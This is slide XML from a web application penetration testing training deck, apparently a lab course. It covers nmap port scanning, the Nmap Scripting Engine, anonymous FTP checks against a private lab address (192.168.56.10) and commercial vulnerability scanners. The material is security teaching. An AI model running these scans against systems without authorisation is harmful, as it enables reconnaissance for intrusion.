        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328"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29"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30"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447D99A3-5305-43F9-91A9-1CEE89C9402D}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>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457200" y="152640"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>We will focus on…</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1752480"/>
            <a:ext cx="7619760" cy="4373280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>“Low Hanging Fruit” concept.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>PHP  programming </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Open Source based</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Web Application Penetration Testing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21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18"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19"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FA282FA9-88EC-402F-AFBA-21927339FD62}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>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Shape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-457200"/>
            <a:ext cx="7543440" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Network mapper (nmap)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="332" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1752480"/>
            <a:ext cx="7619760" cy="4373280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333"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34"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35"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64D3A4E0-7843-491D-A3F6-74E735B35B16}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="336" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152280" y="914400"/>
            <a:ext cx="8610120" cy="52574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Shape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-380880"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Target | Profile</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338"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39"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40"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6E714B66-3609-4FF8-8B80-654EAE071C46}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="341" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2277360" y="1008360"/>
            <a:ext cx="4656240" cy="51174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380880"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Options</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343"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44"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45"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C0FE2D80-73E2-4C39-9DD0-CF3F9F607227}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="346" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="807120" y="1066680"/>
            <a:ext cx="7193520" cy="472752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457200"/>
            <a:ext cx="8152920" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Nmap Scripting Engine (nse)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348"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49"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50"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8F357B6B-7A76-4B3C-8AB8-C294D83689CB}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="351" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="914400"/>
            <a:ext cx="7425720" cy="488016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457200" y="1447920"/>
            <a:ext cx="7772040" cy="4320720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="353" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="228600"/>
            <a:ext cx="7772040" cy="1066320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>nmap –sT –v 192.168.56.10</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="354"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55"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8286BA01-1776-470C-B03B-9F77C4284504}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="356"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357"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457200" y="1447920"/>
            <a:ext cx="7772040" cy="4320720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359"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Open ftp site ftp://192.168.56.10</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="360"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61"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7E1CD2D3-763E-4822-A67C-8D01315FD20E}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="362"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363"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457200" y="1447920"/>
            <a:ext cx="7772040" cy="4320720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="228600"/>
            <a:ext cx="7772040" cy="1066320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Nmap Scripting Engine (NSE)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>nmap –script ftp-anon 192.168.56.10</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="366"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67"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E0782EB9-0EE1-428E-A00E-195FA2DB5ED3}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368"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369" name="Picture 4"/>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Shape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="228600"/>
            <a:ext cx="7772040" cy="4571640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Web server / application scanner</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="371" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4800600"/>
            <a:ext cx="6857640" cy="914040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372"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73"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74"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8596D678-DEB6-4994-BE8A-3DCB1F23D33C}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>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457920" y="1752480"/>
            <a:ext cx="1342800" cy="4373280"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="100080" tIns="100080" rIns="60840" bIns="60840" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2026800" y="1752480"/>
            <a:ext cx="1342800" cy="4373280"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="100080" tIns="100080" rIns="60840" bIns="60840" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Acunetix Web Vulnerability Scanning</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3595680" y="1752480"/>
            <a:ext cx="1342800" cy="4373280"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="100080" tIns="100080" rIns="60840" bIns="60840" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Netsparker</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5164560" y="1752480"/>
            <a:ext cx="1342800" cy="4373280"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="100080" tIns="100080" rIns="60840" bIns="60840" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>IBM AppScan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="379" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6733440" y="1752480"/>
            <a:ext cx="1342800" cy="4373280"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="100080" tIns="100080" rIns="60840" bIns="60840" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>WebCruiser</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380" name="TextShape 6"/>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Commercial tools</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="381" name="TextShape 7"/>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82" name="TextShape 8"/>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383" name="TextShape 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="8227080" y="5885640"/>
            <a:ext cx="1315440" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="45720" tIns="91440" rIns="45720" bIns="91440" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{8A181E0B-635C-4509-B08E-EDF39EBB01E6}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>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457200" y="1447920"/>
            <a:ext cx="7772040" cy="4320720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385"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Nessus Vulnerability Scanner</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386"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87"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58DA4151-20D4-4905-944A-EE646A22261A}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="388"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389" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1503000"/>
            <a:ext cx="7772040" cy="4821480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="390" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="152280"/>
            <a:ext cx="2660400" cy="7520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457200" y="1752480"/>
            <a:ext cx="7619760" cy="4373280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221"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22"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23"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EBC2512E-72BA-435D-8337-1658E0AB9F11}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="224" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8267400" cy="5238360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225" name="TextShape 5"/>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Testing method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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1447920"/>
            <a:ext cx="7772040" cy="4320720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392"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Acunetix</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393"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394"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EF7FBACF-3E5C-47CF-906D-7B78AAA2E0F6}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395"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396" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1504440"/>
            <a:ext cx="7772040" cy="4848480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
